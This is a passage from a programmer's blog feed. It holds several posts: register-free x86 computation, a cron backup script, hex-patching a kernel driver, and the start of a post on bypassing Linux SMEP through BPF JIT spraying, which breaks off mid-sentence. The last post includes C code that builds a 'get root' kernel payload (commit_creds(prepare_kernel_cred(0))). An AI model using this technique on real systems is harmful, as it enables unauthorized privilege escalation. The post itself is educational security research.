and</li><li>self-modifying code.</li></ul><p>But it would be too easy to self-modify an instruction into having a register operand. The above restrictions must hold for every instruction we execute, not just those appearing in our binary. Later on I'll demonstrate experimentally that we aren't cheating.</p><h1 id="the-instruction-set">The instruction set</h1><p>In a RISC architecture, every memory access is a register load or store, and our task would be completely impossible. But x86 does not have this property. For example we can store a constant directly into memory. Here's machine code along with NASM (Intel syntax) assembly:</p><pre><code>c6042500004000ba mov byte [0x400000], 0xba<br />66c7042500004000dbba mov word [0x400000], 0xbadb<br />c7042500004000efbead0b mov dword [0x400000], 0xbadbeef<br />48c7042500004000efbead0b mov qword [0x400000], 0xbadbeef</code></pre><p>In the latter case the 4-byte constant is <a href="http://en.wikipedia.org/wiki/Sign_extension">sign-extended</a> to 8 bytes.</p><p>We can also perform arithmetic on a memory location in place:</p><pre><code>8304250000400010 add dword [0x400000], 0x10</code></pre><p>But moving data around is going to be hard. As far as I know, every instruction which loads from one address and stores to another, for example <code>movsb</code>, depends on registers in some way.</p><p>Conditional control flow is possible thanks to this gem of an instruction:</p><pre><code>ff242500004000 jmp qword [0x400000]</code></pre><p>This jumps to whatever address is stored as a 64-bit quantity at address 0x400000. This seems weird but it's really just a load where the destination register is the instruction pointer. Many RISC architectures also allow this.</p><h1 id="compiling-from-brainfuck">Compiling from Brainfuck</h1><p>Let's get more concrete and talk about compiling <a href="http://esolangs.org/wiki/Brainfuck">Brainfuck</a> code to this subset of x86. Brainfuck isn't the simplest language out there (try <a href="http://esolangs.org/wiki/Subleq">Subleq</a>) but it's pretty familiar as an imperative, structured-control language. So I think compiling from Brainfuck makes this feel &quot;more real&quot; than compiling from something super weird.</p><p>A Brainfuck program executes on a linear tape of (<a href="http://esolangs.org/wiki/Brainfuck#Memory_and_wrapping">typically</a>) byte-size cells.</p><pre><code>TAPE_SIZE equ 30000<br /><br />tape_start:<br /> times TAPE_SIZE dq cell0<br /><br />head equ tape_start + (TAPE_SIZE / 2)</code></pre><p>Like many Brainfuck implementations, the tape has a fixed size (more on this later) and we start in the middle. <code>head</code> is not a variable with a memory location; it's just an assembler constant for the address of the middle of the tape.</p><p>Since our only way to read memory is <code>jmp [addr]</code>, the tape must store pointers to code. We create 256 short routines, each representing one of the values a cell can hold.</p><pre><code>cont_zero: dq 0<br />cont_nonzero: dq 0<br />out_byte: db 0<br /><br />align 16<br />cell_underflow:<br /> jmp inc_cell<br /><br />align 16<br />cell0:<br /> mov byte [out_byte], 0<br /> jmp [cont_zero]<br /><br />%assign cellval 1<br />%rep 255<br /> align 16<br /> mov byte [out_byte], cellval<br /> jmp [cont_nonzero]<br /> %assign cellval cellval+1<br />%endrep<br /><br />align 16<br />cell_overflow:<br /> jmp dec_cell</code></pre><p>There are two things we need to do with a cell: get its byte value for output, and test whether it's zero. So each routine moves a byte into <code>out_byte</code> and jumps to the address stored at either <code>cont_zero</code> or <code>cont_nonzero</code>.</p><p>We produce most of the routines using a <a href="http://www.nasm.us/doc/nasmdoc4.html">NASM macro</a>. We also have functions to handle underflow and overflow, so a cell which would reach -1 or 256 is bumped back to 0 or 255. (We could implement the more typical wrap-around behavior with somewhat more code.)</p><p>The routines are aligned on 16-byte boundaries so that we can implement Brainfuck's <code>+</code> and <code>-</code> by adding or subtracting 16. But how do we know where the head is? We can't store it in a simple memory variable because we'd need a double-indirect jump instruction. This is where the self-modifying code comes in.</p><pre><code>test_cell:<br /> jmp [head]<br /><br />inc_cell:<br /> add qword [head], 16<br /> jmp test_cell<br /><br />dec_cell:<br /> sub qword [head], 16<br /> jmp test_cell<br /><br />move_right:<br /> add dword [inc_cell+4], 8<br /> add dword [dec_cell+4], 8<br /> add dword [test_cell+3], 8<br /> jmp [cont_zero]<br /><br />move_left:<br /> sub dword [inc_cell+4], 8<br /> sub dword [dec_cell+4], 8<br /> sub dword [test_cell+3], 8<br /> jmp [cont_zero]</code></pre><p>Recall that <code>head</code> is an assembler constant for the middle of the tape. So <code>inc_cell</code> etc. will only touch the exact middle of the tape — except that we modify the instructions when we move left or right. The address operand starts at byte 3 or 4 of the instruction (check the disassembly!) and we change it by 8, the size of a function pointer.</p><p>Also note that <code>inc_cell</code> and <code>dec_cell</code> jump to <code>test_cell</code> in order to handle overflow / underflow. By contrast the move instructions don't test the current cell and just jump to <code>[cont_zero]</code> unconditionally.</p><p>To output a byte we <a href="https://github.com/kmcallister/rip/blob/4595341f8635c184f620a01a944a84c700e3641d/rip.asm#L7-L14">perform</a> the system call <a href="http://man7.org/linux/man-pages/man2/write.2.html"><code>write</code></a><code>(1, &amp;out_byte, 1)</code>. There's no escaping the fact that the <a href="http://stackoverflow.com/questions/2535989/what-are-the-calling-conventions-for-unix-linux-system-calls-on-x86-64">Linux system call ABI</a> uses registers, so I allow them here. We can do arbitrary computation without output; it's just nice if we can see the results. Input is <a href="https://github.com/kmcallister/rip/blob/4595341f8635c184f620a01a944a84c700e3641d/rip.asm#L73-L88">messier still</a> but it's not fundamentally different from what we've seen here. Code that self-modifies by calling <a href="http://man7.org/linux/man-pages/man2/read.2.html"><code>read</code></a><code>()</code> is clearly the future of computing.</p><p>Putting it all together, I wrote a small <a href="https://github.com/kmcallister/rip/blob/4595341f8635c184f620a01a944a84c700e3641d/compiler">Brainfuck compiler</a> which does little more than match brackets. For each Brainfuck instruction it outputs one line of assembly, a call to a <a href="https://github.com/kmcallister/rip/blob/4595341f8635c184f620a01a944a84c700e3641d/rip.asm#L91-L135">NASM macro</a> which will load <code>cont_[non]zero</code> and jump to one of <code>test_cell</code>, <code>inc_cell</code>, etc. For the program <code>[+]</code> the compiler's output looks like</p><pre><code>k00000000: do_branch k00000003, k00000001<br />k00000001: do_inc k00000002<br />k00000002: do_branch k00000003, k00000001<br />k00000003: jmp exit</code></pre><p>which blows up into something like</p><pre><code>401205: 48c70425611240005c124000 mov qword ptr [0x401261], 0x40125c<br />401211: 48c704256912400022124000 mov qword ptr [0x401269], 0x401222<br />40121d: e90cefffff jmp 40012e &lt;test_cell&gt;<br /><br />401222: 48c70425611240003f124000 mov qword ptr [0x401261], 0x40123f<br />40122e: 48c70425691240003f124000 mov qword ptr [0x401269], 0x40123f<br />40123a: e9f6eeffff jmp 400135 &lt;inc_cell&gt;<br /><br />40123f: 48c70425611240005c124000 mov qword ptr [0x401261], 0x40125c<br />40124b: 48c704256912400022124000 mov qword ptr [0x401269], 0x401222<br />401257: e9d2eeffffe9d2eeffff jmp 40012e &lt;test_cell&gt;<br /><br />40125c: e9c1eeffff jmp 400122 &lt;exit&gt;</code></pre><p>Even within our constraints, this code could be a lot more compact. For example, a <code>test</code> could be merged with a preceding <code>inc</code> or <code>dec</code>.</p><h1 id="demos">Demos</h1><p>Let's try it out on some of Daniel B Cristofani's <a href="http://www.hevanet.com/cristofd/brainfuck/">Brainfuck examples</a>.</p><pre><code>$ curl -s http://www.hevanet.com/cristofd/brainfuck/rot13.b | ./compiler<br />$ echo &#39;Uryyb, jbeyq!&#39; | ./rip<br />Hello, world!<br /><br />$ curl -s http://www.hevanet.com/cristofd/brainfuck/fib.b | ./compiler<br />$ ./rip<br />0<br />1<br />1<br />2<br />3<br />5<br />8<br />13<br />…</code></pre><p>And now let's try a Brainfuck interpreter written in Brainfuck. There are <a href="http://esolangs.org/wiki/Brainfuck#Self-interpreters">several</a>, but we will choose the <a href="http://homepages.xnet.co.nz/~clive/eigenratios/cgbfi2.b">fastest one</a> (by Clive Gifford), which is also compatible with our handling of end-of-file and cell overflow.</p><pre><code>$ curl -s http://homepages.xnet.co.nz/~clive/eigenratios/cgbfi2.b | ./compiler<br />$ (curl -s http://www.hevanet.com/cristofd/brainfuck/rot13.b;<br /> echo &#39;!Uryyb, jbeyq!&#39;) | ./rip<br />Hello, world!</code></pre><p>This takes about 4.5 seconds on my machine.</p><h1 id="verifying-it-with-ptrace">Verifying it with <code>ptrace</code></h1><p>How can we verify that a program doesn't use registers? There's no CPU flag to disable registers, but setting them to zero after each instruction is close enough. Linux's <a href="http://man7.org/linux/man-pages/man2/ptrace.2.html"><code>ptrace</code></a> system call allows us to manipulate the state of a target process.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="dt">uint64_t</span> regs_boundary;<br /><br /><span class="dt">void</span> clobber_regs(pid_t child) {<br /> <span class="kw">struct</span> user_regs_struct regs_int;<br /> <span class="kw">struct</span> user_fpregs_struct regs_fp;<br /><br /> CHECK(ptrace(PTRACE_GETREGS, child, <span class="dv">0</span>, &amp;regs_int));<br /> <span class="kw">if</span> (regs_int.rip &lt; regs_boundary)<br /> <span class="kw">return</span>;<br /><br /> CHECK(ptrace(PTRACE_GETFPREGS, child, <span class="dv">0</span>, &amp;regs_fp));<br /><br /> <span class="co">// Clear everything before the instruction pointer,</span><br /> <span class="co">// plus the stack pointer and some bits of EFLAGS.</span><br /> memset(&amp;regs_int, <span class="dv">0</span>, offsetof(<span class="kw">struct</span> user_regs_struct, rip));<br /> regs_int.rsp = <span class="dv">0</span>;<br /> regs_int.eflags &amp;= EFLAGS_MASK;<br /><br /> <span class="co">// Clear x87 and SSE registers.</span><br /> memset(regs_fp.st_space, <span class="dv">0</span>, <span class="kw">sizeof</span>(regs_fp.st_space));<br /> memset(regs_fp.xmm_space, <span class="dv">0</span>, <span class="kw">sizeof</span>(regs_fp.xmm_space));<br /><br /> CHECK(ptrace(PTRACE_SETREGS, child, <span class="dv">0</span>, &amp;regs_int));<br /> CHECK(ptrace(PTRACE_SETFPREGS, child, <span class="dv">0</span>, &amp;regs_fp));<br /><br /> clobber_count++;<br />}</code></pre><p>For the layout of <code>struct user_regs_struct</code>, see <a href="https://sourceware.org/git/?p=glibc.git;a=blob;f=sysdeps/unix/sysv/linux/x86/sys/user.h;h=02d3db78891a409c79571343cd732a9cdcdc868a;hb=eefa3be8e4c2c721a9f277d8ea2e11180231829f#l42"><code>/usr/include/sys/user.h</code></a>.</p><p>We allow registers in the first part of the program, which is responsible for system calls. <code>regs_boundary</code> is set by <a href="https://github.com/kmcallister/rip/blob/4595341f8635c184f620a01a944a84c700e3641d/regclobber.c#L42-L58">looking</a> for the symbol <code>FORBID_REGS</code> in the binary.</p><p>We run the target using <code>PTRACE_SINGLESTEP</code>, which sets the <a href="http://en.wikipedia.org/wiki/Trap_flag">trap flag</a> so that the CPU will raise a <a href="http://wiki.osdev.org/Exceptions#Debug">debug exception</a> after one instruction. Linux handles this exception, suspends the traced process, and wakes up the tracer, which was blocked on <a href="http://man7.org/linux/man-pages/man2/waitpid.2.html"><code>waitpid</code></a>.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="kw">while</span> (<span class="dv">1</span>) {<br /> <span class="co">// For this demo it&#39;s simpler if we don&#39;t deliver signals to</span><br /> <span class="co">// the child, so the last argument to ptrace() is zero.</span><br /> CHECK(ptrace(PTRACE_SINGLESTEP, child, <span class="dv">0</span>, <span class="dv">0</span>));<br /> CHECK(waitpid(child, &amp;status, <span class="dv">0</span>));<br /><br /> <span class="kw">if</span> (WIFEXITED(status))<br /> finish(WEXITSTATUS(status));<br /><br /> inst_count++;<br /> clobber_regs(child);<br />}</code></pre><p>And the demo:</p><pre><code>$ gcc -O2 -Wall -o regclobber regclobber.c<br />$ curl -s http://www.hevanet.com/cristofd/brainfuck/rot13.b | ./compiler<br />$ echo &#39;Uryyb, jbeyq!&#39; | time ./regclobber ./rip<br />Hello, world!<br /><br />Executed 81366 instructions; clobbered registers 81189 times.<br />0.36user 1.81system 0:01.96elapsed 110%CPU (0avgtext+0avgdata 1392maxresident)k</code></pre><p>At almost two seconds elapsed, this is hundreds of times slower than running <code>./rip</code> directly. Most of the time is spent in the kernel, handling all those system calls and debug exceptions.</p><p>I <a href="http://mainisusuallyafunction.blogspot.com/2011/01/implementing-breakpoints-on-x86-linux.html">wrote about <code>ptrace</code> before</a> if you'd like to see more of the things it can do.</p><h1 id="notes-on-universality">Notes on universality</h1><p>Our tape has a fixed size of 30,000 cells, the same as Urban Müller's original Brainfuck compiler. A system with a finite amount of state can't really be Turing-complete. But x86 itself also has a limit on addressable memory. So does C, because <span style="white-space:nowrap;"><code>sizeof(void *)</code></span> is finite. These systems <em>are</em> Turing-complete when you add an external tape using I/O, but so is a <a href="http://en.wikipedia.org/wiki/Finite-state_machine">finite-state machine</a>!</p><p>So while x86 isn't really Turing-complete, with or without registers, I think the above construction &quot;feels like&quot; arbitrary computation enough to meet the informal definition of &quot;Turing-complete&quot; commonly used by programmers, for example in the <a href="http://www.cl.cam.ac.uk/~sd601/papers/mov.pdf"><em><code>mov</code> is Turing-complete</em></a> paper. If you know of a way to formalize this idea, do let me know (I'm more likely to notice tweets <a href="https://twitter.com/miuaf"><code>@miuaf</code></a> than comments here).</p>http://mainisusuallyafunction.blogspot.com/2014/02/x86-is-turing-complete-with-no-registers.htmlnoreply@blogger.com (keegan)3tag:blogger.com,1999:blog-1563623855220143059.post-7203635519335559271Mon, 31 Dec 2012 04:36:00 +00002012-12-30T20:36:43.751-08:00codegitimadethisshellA shell recipe for backups with logs and history<p>I wrote a shell script for a <a href="http://en.wikipedia.org/wiki/Cron">cron</a> job that grabs backups of some remote files. It has a few nice features:</p><ul class="incremental"><li>Output from the backup commands is logged, with timestamps.</li><li><code>cron</code> will send me email if one of the commands fails.</li><li>The history of each backup is saved in Git. Nothing sucks more than corrupting an important file and then syncing that corruption to your one and only backup.</li></ul><p>Here's how it works.</p><pre class="sourceCode bash"><code class="sourceCode bash"><span class="co">#!/bin/bash -e</span><br /><br /><span class="kw">cd</span> /home/keegan/backups<br /><span class="ot">log=</span><span class="st">&quot;</span><span class="ot">$(</span><span class="kw">pwd</span><span class="ot">)</span><span class="st">&quot;</span>/log<br /><br /><span class="kw">exec</span> <span class="kw">3&gt;&amp;2</span> <span class="kw">&gt;</span> <span class="kw">&gt;(</span>ts <span class="kw">&gt;&gt;</span> <span class="st">&quot;</span><span class="ot">$log</span><span class="st">&quot;</span><span class="kw">)</span> <span class="kw">2&gt;&amp;1</span></code></pre><p>You may have seen <code>exec</code> used to <a href="http://en.wikipedia.org/wiki/Tail_call">tail-call</a> a command, but here we use it differently. When no command is given, <code>exec</code> <a href="http://tldp.org/LDP/abs/html/x17891.html">applies</a> file redirections to the current shell process.</p><p>We apply timestamps by redirecting output through <code>ts</code> (from <a href="http://joeyh.name/code/moreutils/">moreutils</a>), and append that to the log file. I would write <span class="nowrap"><code>exec | ts &gt;&gt; $log</code></span>, except that pipe syntax is not supported with <code>exec</code>.</p><p>Instead we use <a href="http://tldp.org/LDP/abs/html/process-sub.html">process substitution</a>. <code>&gt;(cmd)</code> expands to the name of a file, whose contents will be sent to the specified command. This file name is a fine target for normal file output redirection with <code>&gt;</code>. (It might name a temporary file created by the shell, or a special file under <code>/dev/fd/</code>.)</p><p>We also redirect standard error to the same place with <code>2&gt;&amp;1</code>. But first we open the original standard error as file descriptor 3, using <code>3&gt;&amp;2</code>.</p><pre class="sourceCode bash"><code class="sourceCode bash"><span class="kw">function</span><span class="fu"> handle_error</span> <span class="kw">{</span><br /> <span class="kw">echo</span> <span class="st">&#39;Error occurred while running backup&#39;</span> <span class="kw">&gt;&amp;3</span><br /> <span class="kw">tail</span> <span class="st">&quot;</span><span class="ot">$log</span><span class="st">&quot;</span> <span class="kw">&gt;&amp;3</span><br /> <span class="kw">exit</span> 1<br /><span class="kw">}</span><br /><span class="kw">trap</span> handle_error ERR</code></pre><p>Since we specified <code>bash -e</code> in the first line of the script, Bash will exit as soon as any command fails. We use <code>trap</code> to register a function that gets called if this happens. The function writes some of the log file to the script's original standard output. <code>cron</code> will capture that and send mail to the system administrator.</p><p>Now we come to the actual backup commands.</p><pre class="sourceCode bash"><code class="sourceCode bash"><span class="kw">cd</span> foo<br />git pull<br /><br /><span class="kw">cd</span> ../bar<br />rsync -v otherhost:bar/baz .<br />git commit --allow-empty -a -m <span class="st">&#39;[AUTO] backup&#39;</span><br />git repack -da</code></pre><p><code>foo</code> is a backup of a Git repo, so we just update a clone of that repo. If you want to be absolutely sure to preserve all commits, you can configure the backup repo to <a href="http://www.kernel.org/pub/software/scm/git/docs/git-gc.html">disable automatic garbage collection</a> and <a href="http://stackoverflow.com/questions/199728/setting-gc-reflogexpire">keep infinite reflog</a>.</p><p><code>bar</code> is a local-only Git repo storing history of a file synced from another machine. Semantically, Git stores each version of a file as a separate <a href="http://git-scm.com/book/en/Git-Internals-Git-Objects">blob</a> object. If the files you're backing up are reasonably large, this can waste a lot of space quickly. But Git supports &quot;packed&quot; storage, where the objects in a repo are compressed together. By <a href="http://www.kernel.org/pub/software/scm/git/docs/git-repack.html">repacking</a> the repo after every commit, we can save a ton of space.</p>http://mainisusuallyafunction.blogspot.com/2012/12/a-shell-recipe-for-backups-with-logs.htmlnoreply@blogger.com (keegan)3tag:blogger.com,1999:blog-1563623855220143059.post-3037758286465799041Tue, 18 Dec 2012 07:18:00 +00002012-12-17T23:18:00.065-08:00codekernelHex-editing Linux kernel modules to support new hardware <p>This is <a href="http://sourceforge.net/apps/mediawiki/mbm/index.php?title=Hex-editing_cdc_ether">an old trick</a> but a fun one. The <a href="http://en.wikipedia.org/wiki/ThinkPad_X1_Carbon">ThinkPad X1 Carbon</a> has no built-in Ethernet port. Instead it comes with a USB to Ethernet adapter. The adapter uses the <a href="http://www.asix.com.tw/products.php?op=pItemdetail&amp;PItemID=86;71;101">ASIX AX88772</a> chip, which Linux has supported since <a href="https://github.com/torvalds/linux/commit/1da177e4c3f41524e886b7f1b8a0c1fc7321cac2">time immemorial</a>. But support for the particular adapter shipped by Lenovo was only added in Linux 3.7.</p><p>This was a problem for me, since I wanted to use a Debian installer with a 3.2 kernel. I could set up a build environment for that particular kernel and recompile the module. But this seemed like an annoying yak to shave when I just wanted to get the machine working.</p><p><a href="https://github.com/torvalds/linux/commit/66dc81ecd71332783c92fb170950d5ddb43da461">The patch</a> to support the Lenovo adapter just adds a new USB device ID to an existing driver:</p><pre><code> }, {<br /><span style="color: green; font-weight: bold;">+ // Lenovo U2L100P 10/100<br />+ USB_DEVICE (0x17ef, 0x7203),<br />+ .driver_info = (unsigned long) &amp;ax88772_info,<br />+}, {</span><br /> // ASIX AX88772B 10/100<br /> USB_DEVICE (0x0b95, 0x772b),<br /> .driver_info = (unsigned long) &amp;ax88772_info,</code></pre><p>As a quick-and-dirty solution, we can edit the compiled kernel module <code>asix.ko</code>, changing that existing device ID <code>(0x0b95, 0x772b)</code> to the Lenovo one <code>(0x17ef, 0x7203)</code>. Since x86 CPUs are <a href="http://en.wikipedia.org/wiki/Endianness">little-endian</a>, this involves changing the bytes</p><pre><code>95 0b 2b 77</code></pre><p>to</p><pre><code>ef 17 03 72</code></pre><p>I wanted to do this within the Debian installer without rebooting. <a href="http://www.busybox.net/">Busybox</a> <code>sed</code> does not support hex escapes, but <code>printf</code> does:</p><pre><code>sed $(printf &#39;s/\x95\x0b\x2b\x77/\xef\x17\x03\x72/&#39;) \<br /> /lib/modules/$(uname -r)/kernel/drivers/net/usb/asix.ko \<br /> &gt; /tmp/asix.ko</code></pre><p>(It's worth checking that none of those bytes have untoward meanings as ASCII characters in a regular expression. As it happens, <code>sed</code> does not recognize <code>+</code> (aka <code>\x2b</code>) as repetition unless preceded by a backslash.)</p><p>Then I loaded the patched module along with its dependencies. A simple way is</p><pre><code>modprobe asix<br />rmmod asix<br />insmod /tmp/asix.ko</code></pre><p>And that was enough for me to complete the install over Ethernet. Of course, once everything is set up, it would be better to compile a properly-patched kernel using <a href="http://www.debian.org/releases/wheezy/amd64/ch08s06.html.en"><code>make-kpkg</code></a>. I haven't got around to it yet because wireless is working great. :)</p>http://mainisusuallyafunction.blogspot.com/2012/12/hex-editing-linux-kernel-modules-to.htmlnoreply@blogger.com (keegan)3tag:blogger.com,1999:blog-1563623855220143059.post-7170397145569265368Sun, 18 Nov 2012 05:51:00 +00002012-11-17T21:51:41.191-08:00ccodeimadethiskernelsecurityAttacking hardened Linux systems with kernel JIT spraying <p>Intel's new Ivy Bridge CPUs support a security feature called <a href="http://www.anandtech.com/show/4830/intels-ivy-bridge-architecture-exposed/2">Supervisor Mode Execution Protection</a> (SMEP). It's supposed to thwart privilege escalation attacks, by preventing the kernel from executing a payload provided by userspace. In reality, there are <a href="http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux/">many ways</a> to bypass SMEP.</p><p>This article demonstrates one particularly fun approach. Since the Linux kernel <a href="https://lwn.net/Articles/437981">implements</a> a just-in-time compiler for Berkeley Packet Filter programs, we can use a JIT spraying attack to build our attack payload within the kernel's memory. Along the way, we will use another fun trick to create thousands of sockets even if <code>RLIMIT_NOFILE</code> is set as low as 11.</p><p>If you have some idea what I'm talking about, feel free to skip the next few sections and get to the gritty details. Otherwise, I hope to provide enough background that anyone with some systems programming experience can follow along. The code is <a href="https://github.com/kmcallister/alameda">available on GitHub</a> too.</p><p>Note to script kiddies: This code won't get you root on any real system. It's not an exploit against current Linux; it's a demonstration of how such an exploit could be modified to bypass SMEP protections.</p><h1 id="kernel-exploitation-and-smep">Kernel exploitation and SMEP</h1><p>The basis of kernel security is the CPU's distinction between user and kernel mode. Code running in user mode cannot manipulate kernel memory. This allows the kernel to store things (like the user ID of the current process) without fear of tampering by userspace code.</p><p>In a typical kernel exploit, we trick the kernel into jumping to our payload code while the CPU is still in kernel mode. Then we can mess with kernel data structures and gain privileges. The payload can be an ordinary function in the exploit program's memory. After all, the CPU in kernel mode is allowed to execute user memory: it's allowed to do anything!</p><p>But what if it wasn't? When SMEP is enabled, the CPU will block any attempt to execute user memory while in kernel mode. (Of course, the kernel still has ultimate authority and can disable SMEP if it wants to. The goal is to prevent <em>unintended</em> execution of userspace code, as in a kernel exploit.)</p><p>So even if we find a bug which lets us hijack kernel control flow, we can only direct it towards legitimate kernel code. This is a lot like exploiting a userspace program with <a href="http://en.wikipedia.org/wiki/NX_bit">no-execute</a> data, and the same techniques apply.</p><p>If you haven't seen some kernel exploits before, you might want to check out the <a href="http://mainisusuallyafunction.blogspot.com/2012/01/writing-kernel-exploits.html">talk</a> I gave, or the many references linked from those slides.</p><h1 id="jit-spraying">JIT spraying</h1><p><a href="http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf">JIT spraying</a> [PDF] is a viable tactic when we (the attacker) control the input to a <a href="http://en.wikipedia.org/wiki/Just-in-time_compilation">just-in-time compiler</a>. The JIT will write into executable memory on our behalf, and we have some control over what it writes.</p><p>Of course, a JIT compiling untrusted code will be careful with what instructions it produces. The trick of JIT spraying is that seemingly innocuous instructions can be trouble when looked at another way. Suppose we input this (pseudocode) program to a JIT:</p><pre><code>x = 0xa8XXYYZZ<br />x = 0xa8PPQQRR<br />x = ...</code></pre><p>(Here <code>XXYYZZ</code> and <code>PPQQRR</code> stand for arbitrary three-byte quantities.) The JIT might decide to put variable <code>x</code> in the <code>%eax</code> machine register, and produce x86 code like this:</p><pre><code>machine code assembly (AT&amp;T syntax)<br /><br />b8 ZZ YY XX a8 mov $0xa8XXYYZZ, %eax<br />b8 RR QQ PP a8 mov $0xa8PPQQRR, %eax<br />b8 ...</code></pre><p>Looks harmless enough. But suppose we use a vulnerability elsewhere to direct control flow to the second byte of this program. The processor will then see an instruction stream like</p><pre><code>ZZ YY XX (payload instruction)<br />a8 b8 test $0xb8, %al<br />RR QQ PP (payload instruction)<br />a8 b8 test $0xb8, %al<br />...</code></pre><p>We control those bytes <code>ZZ YY XX</code> and <code>RR QQ PP</code>. So we can smuggle any sequence of three-byte x86 instructions into an executable memory page. The classic scenario is browser exploitation: we embed our payload into a JavaScript or Flash program as above, and then exploit a browser bug to redirect control into the JIT-compiled code. But it works equally well against kernels, as we shall see.</p><h1 id="attacking-the-bpf-jit">Attacking the BPF JIT</h1><p>Berkeley Packet Filters (BPF) allow a userspace program to specify which network traffic it wants to receive. Filters are <a href="http://www.freebsd.org/cgi/man.cgi?query=bpf&amp;apropos=0&amp;sektion=0&amp;manpath=FreeBSD+8-current&amp;format=html#FILTER_MACHINE">virtual machine</a> programs which run in kernel mode. This is done for efficiency; it avoids a system call round-trip for each rejected packet. Since version 3.0, Linux on AMD64 optionally <a href="http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=0a14842f5a3c0e88a1e59fac5c3025db39721f74">implements</a> the BPF virtual machine using a just-in-time compiler.</p><p>For our JIT spray attack, we will build a BPF program in memory.</p><pre class="sourceCode c"><code class="sourceCode c">size_t code_len = <span class="dv">0</span>;<br /><span class="kw">struct</span> sock_filter code[<span class="dv">1024</span>];<br /><br /><span class="dt">void</span> emit_bpf(<span class="dt">uint16_t</span> opcode, <span class="dt">uint32_t</span> operand) {<br /> code[code_len++] = (<span class="kw">struct</span> sock_filter) BPF_STMT(opcode, operand);<br />}</code></pre><p>A BPF &quot;load immediate&quot; instruction will compile to <span style="white-space: nowrap;"><code>mov $x, %eax</code></span>. We embed our payload instructions inside these, exactly as we saw above.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="co">// Embed a three-byte x86 instruction.</span><br /><span class="dt">void</span> emit3(<span class="dt">uint8_t</span> x, <span class="dt">uint8_t</span> y, <span class="dt">uint8_t</span> z) {<br /> <span class="kw">union</span> {<br /> <span class="dt">uint8_t</span> buf[<span class="dv">4</span>];<br /> <span class="dt">uint32_t</span> imm;<br /> } operand = {<br /> .buf = { x, y, z, <span class="bn">0xa8</span> }<br /> };<br /><br /> emit_bpf(BPF_LD+BPF_IMM, operand.imm);<br />}<br /><br /><span class="co">// Pad shorter instructions with nops.</span><br /><span class="ot">#define emit2(_x, _y) emit3((_x), (_y), 0x90)</span><br /><span class="ot">#define emit1(_x) emit3((_x), 0x90, 0x90)</span></code></pre><p>Remember, the byte <code>a8</code> eats the opcode <code>b8</code> from the following legitimate <code>mov</code> instruction, turning into the harmless instruction <span style="white-space: nowrap;"><code>test $0xb8, %al</code></span>.</p><p>Calling a kernel function is a slight challenge because we can only use three-byte instructions. We load the function's address one byte at a time, and sign-extend from 32 bits.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="dt">void</span> emit_call(<span class="dt">uint32_t</span> addr) {<br /> emit2(<span class="bn">0xb4</span>, (addr &amp; <span class="bn">0xff000000</span>) &gt;&gt; <span class="dv">24</span>); <span class="co">// mov $x, %ah</span><br /> emit2(<span class="bn">0xb0</span>, (addr &amp; <span class="bn">0x00ff0000</span>) &gt;&gt; <span class="dv">16</span>); <span class="co">// mov $x, %al</span><br /> emit3(<span class="bn">0xc1</span>, <span class="bn">0xe0</span>, <span class="bn">0x10</span>); <span class="co">// shl $16, %eax</span><br /> emit2(<span class="bn">0xb4</span>, (addr &amp; <span class="bn">0x0000ff00</span>) &gt;&gt; <span class="dv">8</span>); <span class="co">// mov $x, %ah</span><br /> emit2(<span class="bn">0xb0</span>, (addr &amp; <span class="bn">0x000000ff</span>)); <span class="co">// mov $x, %al</span><br /> emit2(<span class="bn">0x48</span>, <span class="bn">0x98</span>); <span class="co">// cltq</span><br /> emit2(<span class="bn">0xff</span>, <span class="bn">0xd0</span>); <span class="co">// call *%rax</span><br />}</code></pre><p>Then we can build a classic &quot;get root&quot; payload like so:</p><pre class="sourceCode c"><code class="sourceCode c">emit3(<span class="bn">0x48</span>, <span class="bn">0x31</span>, <span class="bn">0xff</span>); <span class="co">// xor %rdi, %rdi</span><br />emit_call(get_kernel_symbol(<span class="st">&quot;prepare_kernel_cred&quot;</span>));<br />emit3(<span class="bn">0x48</span>, <span class="bn">0x89</span>, <span class="bn">0xc7</span>); <span class="co">// mov %rax, %rdi</span><br />emit_call(get_kernel_symbol(<span class="st">&quot;commit_creds&quot;</span>));<br />emit1(<span class="bn">0xc3</span>); <span class="co">// ret</span></code></pre><p>This is just the C call</p><pre class="sourceCode c"><code class="sourceCode c">commit_creds(prepare_kernel_cred(<span class="dv">0</span>));</code></pre><p>expressed in our strange dialect of machine code. It will give root privileges to the process the kernel is currently acting on behalf of, i.e., our exploit program.</p><p>Looking up function addresses is a well-studied part of kernel exploitation. My <code>get_kernel_symbol</code> just greps through <code>/proc/kallsyms</code>, which is a simplistic solution for demonstration purposes. In a real-world exploit you would search a number of sources, including hard-coded values for the precompiled kernels put out by major distributions.</p><p>Alternatively the JIT spray payload could just disable SMEP, then jump to a traditional payload in userspace memory. We don't need any kernel functions to disable SMEP; we just poke a CPU control register. Once we get to the traditional payload, we're running normal C code in kernel mode, and we have the flexibility to search memory for any functions or data we might need.</p><h1 id="filling-memory-with-sockets">Filling memory with sockets</h1><p>The &quot;spray&quot; part of JIT spraying involves creating many copies of the payload in memory, and then making an informed guess of the address of one of them. In Dion Blazakis's original paper, this is done using a separate information leak in the Flash plugin.</p><p>For this kernel exploit, it turns out that we don't need any information leak. The BPF JIT <a href="http://lxr.linux.no/linux+v3.6.5/arch/x86/net/bpf_jit_comp.c#L627">uses <code>module_alloc</code></a> to allocate memory in the <a href="http://lxr.linux.no/linux+v3.6.5/Documentation/x86/x86_64/mm.txt">1.5 GB space</a> reserved for kernel modules. And the compiled program is aligned to a <a href="http://en.wikipedia.org/wiki/Page_(computer_memory)">page</a>, i.e., a multiple of 4 kB. So we have fewer than 19 bits of address to guess. If we can get 8000 copies of our program into memory, we have a 1 in 50 chance on each guess, which is not too bad.</p><p>Each socket can only have one packet filter attached, so we need to create a bunch of sockets. This means we could run into the <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/setrlimit.2.html">resource limit</a> on the number of open files. But there's a fun way around this limitation. (I learned this trick from <a href="http://blog.nelhage.com/">Nelson Elhage</a> but I haven't seen it published before.)</p><p><a href="http://en.wikipedia.org/wiki/Unix_domain_socket">UNIX domain sockets</a> can transmit things other than raw bytes. In particular, they can <a 